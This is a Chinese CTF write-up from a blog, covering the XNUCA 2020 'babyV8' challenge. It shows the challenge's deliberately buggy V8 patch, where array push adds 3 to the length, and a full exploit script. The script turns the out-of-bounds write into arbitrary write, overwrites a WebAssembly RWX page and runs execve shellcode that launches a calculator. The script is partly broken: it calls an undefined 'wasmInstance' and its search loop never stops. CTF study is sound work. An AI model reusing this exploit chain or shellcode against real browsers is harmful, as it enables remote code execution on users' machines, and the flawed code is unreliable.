xnuca2020-babyV8

最新推荐文章于 2024-08-10 21:02:37 发布
最新推荐文章于 2024-08-10 21:02:37 发布
阅读量419 收藏 8
点赞数 6
文章标签: javascript 安全 汇编 网络安全 pwn v8
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/136332456
版权

diff文件

diff --git a/src/codegen/code-stub-assembler.cc b/src/codegen/code-stub-assembler.cc
index 16fd384..8bf435a 100644
--- a/src/codegen/code-stub-assembler.cc
+++ b/src/codegen/code-stub-assembler.cc
@@ -2888,7 +2888,7 @@ TNode<Smi> CodeStubAssembler::BuildAppendJSArray(ElementsKind kind,
       [&](TNode<Object> arg) {
         TryStoreArrayElement(kind, &pre_bailout, elements, var_length.value(),
                              arg);
-        Increment(&var_length);
+        Increment(&var_length, 3);//实际上var_length += 3
       },
       first);
   {



  TNode<Smi> BuildAppendJSArray(ElementsKind kind, TNode<JSArray> array,
                                CodeStubArguments* args,
                                TVariable<IntPtrT>* arg_index, Label* bailout);

TNode<Smi> CodeStubAssembler::BuildAppendJSArray(ElementsKind kind,
                                                 TNode<JSArray> array,
                                                 CodeStubArguments* args,
                                                 TVariable<IntPtrT>* arg_index,
                                                 Label* bailout) {
  Comment("BuildAppendJSArray: ", ElementsKindToString(kind));
  Label pre_bailout(this);
  Label success(this);
  TVARIABLE(Smi, var_tagged_length);
  TVARIABLE(BInt, var_length, SmiToBInt(LoadFastJSArrayLength(array))); // var_length = array.length
  TVARIABLE(FixedArrayBase, var_elements, LoadElements(array));

  TNode<IntPtrT> first = arg_index->value();
  TNode<BInt> growth = IntPtrToBInt(IntPtrSub(args->GetLength(), first));
  PossiblyGrowElementsCapacity(kind, array, var_length.value(), &var_elements, growth, &pre_bailout);

  CodeStubAssembler::VariableList push_vars({&var_length}, zone());
  TNode<FixedArrayBase> elements = var_elements.value(); // 复制数组
  // 执行push方法
  args->ForEach(
      push_vars,
      [&](TNode<Object> arg) {
        // 将 arg 存储到 elements 中
        // 这里的 var_length.value() 是 index, arg 是 value
        // 即 array[index] = value
        TryStoreArrayElement(kind, &pre_bailout, elements, var_length.value(), arg);
        // 这里每次将 var_length 加 3
        // Increment(&var_length);
        Increment(&var_length, 3);
      },
      first);
  {
    // 设置 length = var_length.value()
    TNode<Smi> length = BIntToSmi(var_length.value());
    var_tagged_length = length;
    // 修改 array.length = var_length.value()
    StoreObjectFieldNoWriteBarrier(array, JSArray::kLengthOffset, length);
    Goto(&success);
  }

  BIND(&pre_bailout);
  {
    TNode<Smi> length = ParameterToTagged(var_length.value());
    var_tagged_length = length;
    TNode<Smi> diff = SmiSub(length, LoadFastJSArrayLength(array));
    StoreObjectFieldNoWriteBarrier(array, JSArray::kLengthOffset, length);
    *arg_index = IntPtrAdd(arg_index->value(), SmiUntag(diff));
    Goto(bailout);
  }

  BIND(&success);
  // 返回最后的数组大小 array.length
  return var_tagged_length.value();
}

漏洞就出在+3上面正常push一次会导致数组的长度加3将会导致越界问题。

var a = [];
a[0] = 1.1;
a.push(1.1,1.1,1.1,1.1,1.1,1.1);
var b = new Array(1.1,2.2);

使用new将使得element元素在对象下方配合a数组的越界可以修改到b数组的长度属性。修改完b的长度属性接下来就是搜索wasmcode的地址以及使用dataview的任意写替换wasmcode完成利用。

脚本

function debug(o){
 %DebugPrint(o);
 %SystemBreak();
}
function hex(num){
 return '0x' + num.toString(16);
}
function print(data){
 console.log(data);
}
var raw_buf = new ArrayBuffer(8);
var d_buf = new Float64Array(raw_buf);
var l_buf = new BigInt64Array(raw_buf);

function dtl(x)
{
        d_buf[0] = x;
        return l_buf[0];
}

function ltd(x)
{
        l_buf[0] = x;
        return d_buf[0];
}

function u64_l(val) {
   dv.setFloat64(0,val,true);
   return dv.getUint32(0,true);
}


function u64_h(val) {
   dv.setFloat64(0,val,true);
   return dv.getUint32(0x4,true);
}

var a = [];
a[0] = 1.1;
a.push(1.1,1.1,1.1,1.1,1.1,1.1);
var b = new Array(1.1,2.2);
var data = dtl(a[18]);
a[18] = ltd(data + 0xf000000000000n);
var buf = new ArrayBuffer(0x100);
var dv = new DataView(buf);

const wasm_code = new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);

var wasm_module = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var func = wasmInstance.exports.main;
var l;
var h;
var d= 0;
for (var i=0xff;i>=1;i-=1) {
   d = b[0x31200+i];
   l = u64_h(d);
   d = b[0x31200+i+1];
   h = u64_l(d);
   if (parseInt(h) != 0 && parseInt(l) != 0 && parseInt(l & 0xFFF) == 0) {
      print("fond!");
      
   }
}
b[0x8] = ltd(BigInt(l >> 32));
b[0x9] = ltd(BigInt(h));
var adw = new DataView(buf);
debug(buf);
for (var i=0;i<shellcode.length;i++) {
   adw.setUint32(i,shellcode[i], true);
}
func();
萌の鱼
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020-XNUCA babyv8
weixin_46483787的博客
12-18 430
做的第一道存在指针压缩机制的V8题,通过小越界写修改length构造大越界读写,然后利用arraybuffer的backing store构造任意地址写,利用wasm rwx段地址的特点以及堆空间的分布,搜索到rwx段的具体地址,然后利用任意地址写将shellcode写到rwx段上去即可。
v8 pwn入门篇利用合集
qq_61670993的博客
01-01 972
V8 PWN 入门题目
BUUCTF-[GWCTF 2019]babyvm
weixin_61154173的博客
04-09 945
vm简单逆向,switch不同,赋值给的对象不同,所以可以看做是不同寄存器,所以0xE1->eax,0xE2->ebx,0xE3->ecx,0xE5->edx。这种简单vm逆向搞了快半辈子了,看别人wp也看的迷迷糊糊的,可能是受一个python虚拟机题的影响,第一次见vm,简单记录一下~发现是一堆数据,根据对vm的简单了解,这些应该是操作码,继续看函数其他的部分,应该是操作码及其对应的操作指令。是个异或操作,看异或对象可知,xor eax,ebx。乘的操作,看操作对象是 mul eax,edx。
OC面向对象之---类、对象和方法
BabyV5的专栏
04-26 987
OC入门之面向对象和对类,对象,方法,属性的解释。。。
CTF逆向-[GWCTF 2019]babyvm-WP-虚机模拟流程反向编码和z3约束求解器解方程工具的使用
serfend's blog
04-13 651
CTF逆向-[GWCTF 2019]babyvm-WP-虚机模拟流程反向编码和z3约束求解器解方程工具的使用 来源:https://buuoj.cn/ 内容: 附件:https://pan.baidu.com/s/1FKkXN6JDI0QkGw-UE2crNA?pwd=grb0 提取码:grb0 答案:Y0u_hav3_r3v3rs3_1t! 总体思路 发现是虚机模拟 形成每个指令的逆向 找到加密值位置(有可能不止一个位置,该题就给了一个误导的) 找到命令执行的流程(也是不止一个) 逆向编写反向加密得到f
离散对数求解算法
热门推荐
小周的专栏
01-21 1万+
///大步小步算法 struct baby///小步算法预存的结构体定义 { long long b,j; bool operator < (const baby &other)const{ return b<other.b; } }babyv[100005]; ///快速幂,x^y%mod long long q_pow(long long x,long
Java 进阶day11 IO流的异常处理,缓冲流,转换流,对象流,打印流,属性集,装饰模式
weixin_44504809的博客
04-04 142
Java 进阶day11IO流的异常处理,缓冲流,转换流,对象流,打印流,属性集,装饰模式
原根和离散对数BSGS求法(高次同余方程)
zjyang12345的博客
04-07 840
原根&离散对数 一.原根 1.定义: (a与m互质)使成立的最小的d(记住原根是a,不是d!) 2.原根的性质:一般给出p(有时叫m) 1.具有原根的数字仅有以下几种形式:,(p是奇质数) 2.一个数的最小原根的大小不超过 3.原根个数Φ(Φ(m))个,m为质数则原根个数Φ(m-1) 3.求解原根的基本步骤: 判断一个数是否有原根。(通过性质1,枚举质数即可) 求得最小...
推荐开源项目: chocV —— 现代化小巧键盘的创新之作
gitblog_00076的博客
06-11 341
推荐开源项目: chocV —— 现代化小巧键盘的创新之作 项目地址:https://gitcode.com/brickbots/chocV 1、项目介绍 chocV 是一款基于 Horizon 构建理念和简化版 BabyV 布局设计的36键巧克力键帽键盘。它的诞生源于对创新构造与独特布局的热爱融合,将 Horizon 的结构优势与 Miryoku 布局的实用性相结合,创造出一种全新的个人定制键...
Vue项目通过宝塔部署之后,页面刷新后浏览器404页面
水w的博客
08-07 282
Vue项目通过宝塔部署之后,页面刷新后浏览器404页面
牛客JS题(三十四)监听对象
不起眼小菜菜的博客
08-10 332
注释很详细,直接上代码……
【Vue3】图片未加载成功前占位
菜就多练
08-08 306
原生img标签可以通过自定义指令解决< template > < img class = " image_item-img " v-preload = " ' loading' " src = " https://xx " alt = " 加载失败 " /> < script setup > import {reactive } from 'vue' // 自定义图片占位 const vPreload = {
Ant-Design-Vue快速上手 指南+排坑(下)
Dingdangr的博客
08-10 359
确保你正确定义了校验规则。Ant Design Vue 3.x 及以上版本推荐使用Form.Item的rules属性来定义校验规则,这是一个数组,可以包含多个校验项。html复制代码label="用户名":rules="[{ required: true, message: '请输入用户名!' }, { min: 3, message: '用户名至少为3个字符!' }]"如果 Ant Design Vue 提供的校验规则不满足你的需求,你可以自定义校验规则。
社交媒体分享预览图片和内容修改
wangweiscsdn的博客
08-06 226
社交媒体分享链接时的预览图片和内容
创建一个简单的贪吃蛇游戏:HTML、CSS和JavaScript教程
Mr_Zhangyuge的博客
08-08 1092
在本教程中,我们将逐步构建一个简单的贪吃蛇游戏。这个项目适合初学者,可以帮助你理解HTML、CSS和JavaScript的基础知识,并掌握如何将它们结合起来创建一个完整的游戏。
Vue 标准开发方式与组件、插槽的高效使用
小刘哥的博客
08-10 293
Vue.js 是一个渐进式的 JavaScript 框架,适用于构建用户界面。本文将详细探讨 Vue.js 的标准开发方式,以及如何有效地使用组件、插槽等核心功能。
Unity数据持久化 之 Json序列化与反序列化
2301_77947509的博客
08-09 392
Json的序列化与反序列化
Vue3中的history模式路由:打造无缝导航体验!
最新发布
Jacklx888的博客
08-10 113
Hey小伙伴们,今天给大家带来Vue3中使用history模式路由的实战案例!🌟 Vue3的路由功能非常强大,可以帮助我们轻松实现单页面应用中的页面切换。但是你知道吗?默认情况下Vue Router使用的是hash模式,URL会带上一个“#”。为了获得更加美观的URL,我们可以使用history模式。今天我们就来一起看看如何在Vue3中使用history模式吧!🚀
i5ting_toc工具优化
麦麦麦先森的小世界
08-07 569
markdown转换支持带左侧导航的html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值